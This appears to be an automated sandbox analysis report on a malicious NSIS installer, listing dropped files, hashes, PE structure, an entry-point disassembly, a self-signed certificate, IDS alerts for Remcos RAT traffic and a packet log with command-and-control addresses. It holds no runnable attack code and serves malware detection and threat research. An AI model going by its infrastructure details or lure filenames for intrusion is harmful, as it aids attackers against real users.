Preview: {. "geoplugin_request":"191.96.150.187",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
Process:C:\Users\user\Desktop\asXlZG3aW6.exe
File Type:data
Category:dropped
Size (bytes):40737
Entropy (8bit):1.2389874957793674
Encrypted:false
SSDEEP:384:T2+RMqzowpQiyrzM4z9yQkjMuWmGmsCtRMFwZqvZ3uEr:TkUbBwuW/lvZ3Z
MD5:FF8F7AB23828659C95DFE70F38396D11
SHA1:600CA9BCEDC89C4D09700FC026D202B75FA912BF
SHA-256:6B58CFC8557F3DF7B7A3C4BEC537F1F1D3A8AAD181F90FF5510C7CF3AA071D7E
SHA-512:DF1DEC9390BB953BB2FD2890FAA8774D30B131DA197BDDE4EEAB74B2F047C280369FD401DB488254CBA7026D86B09C2BE185243528D5D0066CB7A602C93747CC
Malicious:false
Preview:N....^.......>......."...............................................c..............I.............6......................................?...........................................................}.................h.k........................................]........................}....................................Y.......................>.?x...........................+E....V.........6..........................................................................;.........>................].."......................t............................................[...............................................>..............].............}........Y..........................(..............,.......(................................t...e......../................................m.....p.............p.0...........0.........c.................$..........]..I......7..................u...............U......!..................................................................w............................

Process:C:\Users\user\Desktop\asXlZG3aW6.exe
File Type:data
Category:dropped
Size (bytes):157817
Entropy (8bit):7.749478906211848
Encrypted:false
SSDEEP:3072:gnIneUvKwEn40ehoKmbJrFfdhK1tinDQxs3mDtO/27Kw23DaaZ1:wNLn4XUJw1tiDMQ/Dlx1
MD5:C673D9D0189C507C168EBBB4231C4ECD
SHA1:D0B623EEC05DE3463C126257B3431DDBEFB32780
SHA-256:5477DC5E06DCDBA04A8AD8EFEB34812A51FD01F92C13C83BB3AB223291631679
SHA-512:C3F4C7E1076E20271B9738A11AC22B4B40A450090C0736807DD2F2BE5283E00F60C8420942AA2B5044FD7001FDDFDC76362AD1C11B44E3D2F8BA2F2A3DF98295
Malicious:false
Preview:............~.......................P......8..........++.{............y...uu....5................................WW............]]]]]]].........b...f...................m.QQ..........11.kk....xx...................***......=.................YY..8...ss."..................c.................................`......................l..../.....G.nn..}}}}...........WW...........................;.SS.ss.........%...........mm...................... ....ttt...r...s.............................T..^^......y.v....@@...................................UUU......J.................iii............x..................??????..................]].................PP..{.8.............................W..a...........`f................[.q...f........P.f.....x.........f...!....|....f....\....f!.X......v)........f...!.........f.....u/f...........* .......~.f.........,^.......................4.1...............f...............J...|.=..et<P..f...f!..(.0.f..Q......Tf.........`.....=...&..*./.f......a....f...

Process:C:\Users\user\Desktop\asXlZG3aW6.exe
File Type:data
Category:dropped
Size (bytes):24379
Entropy (8bit):1.2877836589226113
Encrypted:false
SSDEEP:96:vj9QuXWgrg/taXBoTUjTCtW2l+tlxtYpvGrF35bcDRk7:7euXC4GTUjTCtWptlgGRpYDRk7
MD5:82F6FE55582C08895D7AED7EBCD309E0
SHA1:46FEA0B972557ED20C61318A290790D45BB56AD2
SHA-256:BBE23D455ECA17ACBE3A3E69348894EB4192FCCA34B8D4E8500B927F8B847191
SHA-512:2D8D49CCDBB0576DFAA6EA7388808FB97A67EA77B7513ADFD3A3CF82D808D9CA565055962E831322B9C0B8E61878E36DD0C2F03F90FC2D18BBC3C57D7BD1D62F
Malicious:false
Preview:.........................................................................$..........................Q..........O....................[.............H...............q............,....h.........................n.........f...............................................................%...............................N...........p.................w........................................................\.........................................0./...........=..........................................b....................z....v....[n...............................h........................................................$..................9.d...........C...................T.......K............................................e................F............ ........................................................................h....................................................?.....0................................................................................................................

Process:C:\Users\user\Desktop\asXlZG3aW6.exe
File Type:Matlab v4 mat-file (little endian) \260\260\260, numeric, rows 175, columns 640024782, imaginary
Category:dropped
Size (bytes):5446
Entropy (8bit):4.783831678395652
Encrypted:false
SSDEEP:96:Omc7iiRgxbsSiQlfb4qQbgvMyAPkNhnlXOpo8/XEKpGFWqG02:dB6VQlfbnmgvSPkzlXOd/XEKrrX
MD5:5D479B8253A73120FFAF15D5A08DFF32
SHA1:969526C8E82E2F103734DE4155A51B3BCC78558C
SHA-256:4681F0FC679934F38909309D25CBD3097CC15D6451006F406B2DE93A31F62AE0
SHA-512:4D7FF92EB936D2328CCB83CB376CCC8868FF1E6F8FDE99D6F694F7A5A7C087801B0052B2950EC8AF411817A55021E38C75BB03EA0F4FE250009A2FA0F16D0BB7
Malicious:false
Preview:..........&&&.........................4......4..................~..VVV.......................................................................................................................................................................................................................................................................................J...4...................JJ.FFFFF.............h.###................................................"""...cccc...........................}....k.....i........DDD.hh....................D........JJJJJ..PPP..........R.q............3........))))..............S......................)))......[......O......cc..........u.@@@@@....q.........................^^..........3.......................bb.....................[[.........@@.....]]]......................................,.H.e....GGGGG..................T.....@@@@......./.....W....ww.............88........w...........).........c.....................00...0.....

Process:C:\Users\user\Desktop\asXlZG3aW6.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):346
Entropy (8bit):4.268352562006007
Encrypted:false
SSDEEP:6:eMBMSmF/MTCaCIYIE42xIsnCRAbA3C6rNzxU2PrmCPAyEzFE:eMBMSmFlv9xIqCoA399xU9FE
MD5:D378C78EBC1A9D40DA5E104B7D7D7E22
SHA1:9AA3FC54431533BE92C2C39A025B040CAF20E1DD
SHA-256:E5ED569DABF0C53A829B15785CCEF9B64093381381850C395E12CB72F66EB342
SHA-512:FF2A297C6969F9166A046EF95893DE9327A8AF19EA50BE8D163D48F46549312E6E0F40C0944829A6E2974A016A62261864668059B380803F8C40CE4306F43144
Malicious:false
Preview:uselvstndig fuglegrs kontingentbwr.lednings kupforsg drearies fagmandens.arnottos bowery ninetyknot strumaticness cystein tragion parodial stdfangeren tonsillen..stjkildes syringium ablesse studinerne.furnishings spejlkabinettets parentesstrukturernes undvrligt lithotriptor progs,cicatrix sancties longboat bjergkderne udeerhvervs salgsperioden.

Process:C:\Users\user\Desktop\asXlZG3aW6.exe
File Type:data
Category:dropped
Size (bytes):222294
Entropy (8bit):1.2577793212036361
Encrypted:false
SSDEEP:768:CRqvVaI4KC9RxN9T9vtnvZn0daCx2DLwbM+4xArw7pwAoOpZKFvb/me1P3TetAJt:I7nF9oX4+rwZeTNl1RR
MD5:14FEF3D8F0F6E481B60A7FA7F6B94033
SHA1:2021E349D958D63EAC148A2DC82479A8B31F5E1E
SHA-256:726E6DF9C645C59EEF4E8F3576F3F8A6D7124B51F4B9E24F4425EF1859B01894
SHA-512:CC36AD4A90148A9B608C6DE1FAC39311E49B61D002437FD68D1960B76F6194CA94C1110B708E33B33D58B0919471E3AD1AD83D9E0E9AAB51B07FB4FFF0681A55
Malicious:false
Preview:......................................D.T...................................................(...............=.........................(...........e.................E....................................................?............J......7.............r.......&......Z.........................Y....p.................c.......de..................................................#....................../.......Q......r......................................`...o...............................g.........................................................V...................o.............V........7.........y...........................m.....C..L.......................3.........?............................{..........................................|Q..v.............................../........................Wp......................................F......................3..h.................................................................................&..........................{..........Q......O..

Process:C:\Users\user\Desktop\asXlZG3aW6.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):292592
Entropy (8bit):7.763622792773295
Encrypted:false
SSDEEP:3072:2wDijpS4DbYccZDMH/VQRTibm2WZadkXXh+gtCyk+CebDbVs9MNoe2jDwwY9ZM+5:2FYVMH/8gm2kBA0bOKq/j0w6MpdyU
MD5:51BFAB682069E4E7A2BA7B8379D3927B
SHA1:852AC154D253E128199C7CF766D74AC8A6E9D146
SHA-256:0FFB9D8B5CC25CD280763FE84065F5F149B17EB5D9E19DD59BA6C324D292572B
SHA-512:FDA596272CA81D10D8D3C6E029D83395D7F305636F1A21E3FE147F8751C52DC162B21BFCF6FCC0FA09D0C2BDDB01E665473A1536C62BAB605C5402996F64B8BF
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 55%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L...z..Y.................d...|.......1............@..................................K....@.................................4........ .. ...........Pm...............................................................................................text...Tb.......d.................. ..`.rdata..T............h..............@..@.data....U...........|..............@....ndata... ...............................rsrc... .... ......................@..@................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\Desktop\asXlZG3aW6.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0x5e65663f, page size 32768, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):41943040
Entropy (8bit):1.4074095512692035
Encrypted:false
SSDEEP:24576:tmztCYitPr9MkiMpGGyVomVZPDQgGETMg9jtkoiGsS7sLhu2j0lfoBg:oi59ldGGyVhPDQgGrhu2
MD5:E69CDE3C8DC162728ADD7F00C3855219
SHA1:D16E1E9B4976202CD65841C352AA0949F9D8FA88
SHA-256:1D78A7AE6420D6E1D28A68460FDADCD4B8B5430DD0601B11B7C92C1693014B33
SHA-512:B3D54A8E4FE3217758A7B8A2E749F35D5A4E336BF37DAA6DE3A8FB0B59E72E7DA46BCA8B39D11A2407870325EFBE902C9E8C86E14363F7881E47EA869C4F5BBA
Malicious:false
Preview:^ef?... ........I...........*...y..........................L...82...|5..3...|S.h.!.L.........................Be ....y7.........................................................................................................bJ......n...............................................................L...L....................................... ........%...|..............................................................L...........................................................................................................................N...:....y!......................................3...|S......................3...|S.................L........#......h.!.L...................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\Desktop\asXlZG3aW6.exe
File Type:Unicode text, UTF-16, little-endian text, with no line terminators
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:3:Qn:Qn
MD5:F3B25701FE362EC84616A93A45CE9998
SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:false
Preview:..

                                                                                                                                                                                  Process:C:\Users\user\Desktop\asXlZG3aW6.exe
                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11264
                                                                                                                                                                                  Entropy (8bit):5.76781505116372
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:MPtkumJX7zBE2kGwfy9S9VkPsFQ1Mx1c:97O2k5q9wA1Mxa
                                                                                                                                                                                  MD5:55A26D7800446F1373056064C64C3CE8
                                                                                                                                                                                  SHA1:80256857E9A0A9C8897923B717F3435295A76002
                                                                                                                                                                                  SHA-256:904FD5481D72F4E03B01A455F848DEDD095D0FB17E33608E0D849F5196FB6FF8
                                                                                                                                                                                  SHA-512:04B8AB7A85C26F188C0A06F524488D6F2AC2884BF107C860C82E94AE12C3859F825133D78338FD2B594DFC48F7DC9888AE76FEE786C6252A5C77C88755128A5B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: aMfizaMilo.exe, Detection: malicious
• Filename: 1ppvR5VRT6.exe, Detection: malicious
• Filename: Ozb8aojWew.exe, Detection: malicious
• Filename: aMfizaMilo.exe, Detection: malicious
• Filename: 1ppvR5VRT6.exe, Detection: malicious
• Filename: Ozb8aojWew.exe, Detection: malicious
• Filename: Documents.com.exe, Detection: malicious
• Filename: Documents.com.exe, Detection: malicious
• Filename: 27062024-322copy.exe, Detection: malicious
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L...R..Y...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..^....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\Desktop\asXlZG3aW6.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):6656
Entropy (8bit):4.994818958746835
Encrypted:false
SSDEEP:96:f7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNPS3e:zXhHR0aTQN4gRHdMqJVgNPR
MD5:B38561661A7164E3BBB04EDC3718FE89
SHA1:F13C873C8DB121BA21244B1E9A457204360D543F
SHA-256:C2C88E4A32C734B0CB4AE507C1A9A1B417A2375079111FB1B35FAB23AEDD41D9
SHA-512:FEDCAAC20722DE3519382011CCF22314AF3EDCD11B69F814DB14710966853B69B9B5FC98383EDCDB64D050FF825264EABA27B1C5ADFE61D1FC9D77F13A052CED
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: Shipping documents 000288488599900.img, Detection: malicious
• Filename: Zincize.exe, Detection: malicious
• Filename: Zincize.exe, Detection: malicious
• Filename: r14836901-5B4A-.exe, Detection: malicious
• Filename: r14836901-5B4A-.exe, Detection: malicious
• Filename: Bootblacks.exe, Detection: malicious
• Filename: Bootblacks.exe, Detection: malicious
• Filename: Halkbank_Ekstre_06535798_98742134.pdf.exe, Detection: malicious
• Filename: Halkbank_Ekstre_87762122_97575533.pdf.exe, Detection: malicious
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L...P..Y...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):7.763622792773295
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:asXlZG3aW6.exe
File size:292'592 bytes
MD5:51bfab682069e4e7a2ba7b8379d3927b
SHA1:852ac154d253e128199c7cf766d74ac8a6e9d146
SHA256:0ffb9d8b5cc25cd280763fe84065f5f149b17eb5d9e19dd59ba6c324d292572b
SHA512:fda596272ca81d10d8d3c6e029d83395d7f305636f1a21e3fe147f8751c52dc162b21bfcf6fcc0fa09d0c2bddb01e665473a1536c62bab605c5402996f64b8bf
SSDEEP:3072:2wDijpS4DbYccZDMH/VQRTibm2WZadkXXh+gtCyk+CebDbVs9MNoe2jDwwY9ZM+5:2FYVMH/8gm2kBA0bOKq/j0w6MpdyU
TLSH:6F540242FFA1C937CDB9473104799F6BAB728E2085426B87B3643F1E3C5319246AE306
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...z..Y.................d...|.....
Icon Hash:0b397c94d451730f
Entrypoint:0x4031f1
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x597FCC7A [Tue Aug 1 00:34:02 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:3abe302b6d9a1256e6a915429af4ffd2
Signature Valid:false
Signature Issuer:CN="xylografen taxiflyvningerne ", O=Eksaminationers, L=Tardinghen, S=Hauts-de-France, C=FR
Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:-2146762487
Certificate Validity (Not Before, Not After):
• Not Before: 20/12/2023 04:48:51, Not After: 19/12/2026 04:48:51
Subject Chain:
• CN="xylografen taxiflyvningerne ", O=Eksaminationers, L=Tardinghen, S=Hauts-de-France, C=FR
Version:3
Thumbprint MD5:1FD958E7FB10BCC3C84CB77EA385F242
Thumbprint SHA-1:21DBA15B04835DD8C468C0B729FCA0A240CB8746
Thumbprint SHA-256:A9273EAF8B8C14D37A0844ED7629802AC8C89F03E6874844922B012F12E84381
Serial:0133359A3AD4FC68D1F12D855EF725D383676E2B
Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080A0h]
call dword ptr [0040809Ch]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042F40Ch], eax
je 00007F780850B253h
push ebx
call 00007F780850E30Ah
cmp eax, ebx
je 00007F780850B249h
push 00000C00h
call eax
mov esi, 00408298h
push esi
call 00007F780850E286h
push esi
call dword ptr [00408098h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F780850B22Dh
push 0000000Ah
call 00007F780850E2DEh
push 00000008h
call 00007F780850E2D7h
push 00000006h
mov dword ptr [0042F404h], eax
call 00007F780850E2CBh
cmp eax, ebx
je 00007F780850B251h
push 0000001Eh
call eax
                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                  je 00007F780850B249h
                                                                                                                                                                                  or byte ptr [0042F40Fh], 00000040h
                                                                                                                                                                                  push ebp
                                                                                                                                                                                  call dword ptr [00408044h]
                                                                                                                                                                                  push ebx
                                                                                                                                                                                  call dword ptr [00408288h]
                                                                                                                                                                                  mov dword ptr [0042F4D8h], eax
                                                                                                                                                                                  push ebx
                                                                                                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                                                                                                  push 00000160h
                                                                                                                                                                                  push eax
                                                                                                                                                                                  push ebx
                                                                                                                                                                                  push 00429830h
                                                                                                                                                                                  call dword ptr [00408178h]
                                                                                                                                                                                  push 0040A188h
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Data directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8534 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x42000 | 0x9220 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x46d50 | 0x9a0 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x298 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Sections

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6254 | 0x6400 | d550b03059038df9bf82548da8080ff6 | False | 0.6676171875 | data | 6.4338643172916266 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1354 | 0x1400 | 5143a41b917c20afc11d259fd85b6ffc | False | 0.4599609375 | data | 5.236269898436511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x25518 | 0x600 | 4c97d95c0fc95b712d16eb7b0ee5a871 | False | 0.4557291666666667 | data | 4.044625496015545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x30000 | 0x12000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x42000 | 0x9220 | 0x9400 | 8c49359dc2f10c4880e9ad8ff14ecafe | False | 0.6563819679054054 | data | 5.825257334851781 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Resources

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x42298 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.6507439773264053
RT_ICON | 0x464c0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.6897302904564315
RT_ICON | 0x48a68 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.74906191369606
RT_ICON | 0x49b10 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.7922131147540984
RT_ICON | 0x4a498 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.8519503546099291
RT_DIALOG | 0x4a900 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x4aa00 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x4ab20 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x4ab80 | 0x4c | data | English | United States | 0.7763157894736842
RT_VERSION | 0x4abd0 | 0x30c | data | English | United States | 0.4756410256410256
RT_MANIFEST | 0x4aee0 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384
Imports

DLL | Import
KERNEL32.dll | GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States | -
Suricata IDS alerts

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-08T16:52:24.650841+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.11.20 | 49735 | 102.65.21.26 | 443 | TCP
2024-10-08T16:52:33.225373+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.11.20 | 49736 | 41.216.188.178 | 2404 | TCP
2024-10-08T16:52:34.443607+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.11.20 | 49737 | 41.216.188.178 | 2404 | TCP
2024-10-08T16:52:34.459283+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.11.20 | 49738 | 41.216.188.178 | 2404 | TCP
2024-10-08T16:52:34.468675+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.11.20 | 49740 | 178.237.33.50 | 80 | TCP
2024-10-08T16:52:34.506109+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.11.20 | 49739 | 41.216.188.178 | 2404 | TCP
TCP packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 16:52:23.392371893 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:23.392393112 CEST | 443 | 49735 | 102.65.21.26 | 192.168.11.20
Oct 8, 2024 16:52:23.392528057 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:23.409293890 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:23.409301996 CEST | 443 | 49735 | 102.65.21.26 | 192.168.11.20
Oct 8, 2024 16:52:24.061996937 CEST | 443 | 49735 | 102.65.21.26 | 192.168.11.20
Oct 8, 2024 16:52:24.062191010 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:24.110626936 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:24.110651970 CEST | 443 | 49735 | 102.65.21.26 | 192.168.11.20
Oct 8, 2024 16:52:24.111072063 CEST | 443 | 49735 | 102.65.21.26 | 192.168.11.20
Oct 8, 2024 16:52:24.111258984 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:24.113223076 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:24.156250000 CEST | 443 | 49735 | 102.65.21.26 | 192.168.11.20
Oct 8, 2024 16:52:24.650846004 CEST | 443 | 49735 | 102.65.21.26 | 192.168.11.20
Oct 8, 2024 16:52:24.650871038 CEST | 443 | 49735 | 102.65.21.26 | 192.168.11.20
Oct 8, 2024 16:52:24.650993109 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:24.650993109 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:24.651005030 CEST | 443 | 49735 | 102.65.21.26 | 192.168.11.20
Oct 8, 2024 16:52:24.651040077 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:24.651088953 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:24.651138067 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:24.955769062 CEST | 443 | 49735 | 102.65.21.26 | 192.168.11.20
Oct 8, 2024 16:52:24.955774069 CEST | 443 | 49735 | 102.65.21.26 | 192.168.11.20
